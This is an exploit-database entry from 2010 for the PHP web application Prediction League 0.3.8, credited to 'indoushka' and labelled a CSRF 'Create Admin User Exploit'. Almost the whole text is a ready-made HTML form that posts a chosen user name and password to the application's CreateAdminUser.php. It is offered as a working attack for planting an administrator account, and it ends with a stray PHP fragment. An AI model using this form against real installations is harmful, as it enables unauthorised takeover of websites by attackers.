Prediction League 0.3.8 CSRF Create Admin User Exploit

2010-04-04T00:00:00
ID 1337DAY-ID-11606
Type zdt
Reporter indoushka
Modified 2010-04-04T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ======================================================
Prediction League 0.3.8 CSRF Create Admin User Exploit
======================================================

========================================================================================                 
| # Title    : Prediction League 0.3.8 CSRF Create Admin User Exploit           
| # Author   : indoushka                                                                                                             
| # Home     : www.iqs3cur1ty.com/vb                                                                                                                                                                                                            
| # Tested on: Lunix Fran?ais v.(9.4 Ubuntu)      
| # Bug      : CSRF Create Admin User Exploit                                                                    
======================      Exploit By indoushka       =================================
 # Exploit  :
  
  <form method="POST" action="http://127.0.0.1/PredictionLeague/CreateAdminUser.php">
    <table>
      <tr>
        <td class="TBLHEAD" colspan="3" align="CENTER">
          <font class="TBLHEAD">
            Admin User Administration
          </font>
        </td>
      </tr>
      <tr>
        <td class="TBLROW">
          <font class="TBLROW">
            Admin User Name
          </font>
        </td>
        <td class="TBLROW">
          <font class="TBLROW">
            <input type="TEXT" size="20" name="USER" value="">
          </font>
        </td>
        <td class="TBLROW">
          <font class="TBLROW">
            The name for the admin user.
          </font>
        </td>
      </tr>
      <tr>
        <td class="TBLROW">
          <font class="TBLROW">
            Password
          </font>
        </td>
        <td class="TBLROW">
          <font class="TBLROW">
            <input type="TEXT" size="20" name="PASSWORD">
          </font>
        </td>
        <td class="TBLROW">
          <font class="TBLROW">
            The password for the admin user.
          </font>
        </td>
      </tr>
      <tr>
        <td colspan="3" class="TBLROW" align="CENTER">
          <input type="SUBMIT" NAME="CREATE" VALUE="CREATE">
        </td>
      </tr>
    </table>
  </form>
<?php
  }
?>
 
  </body>
</html>



#  0day.today [2016-04-20]  #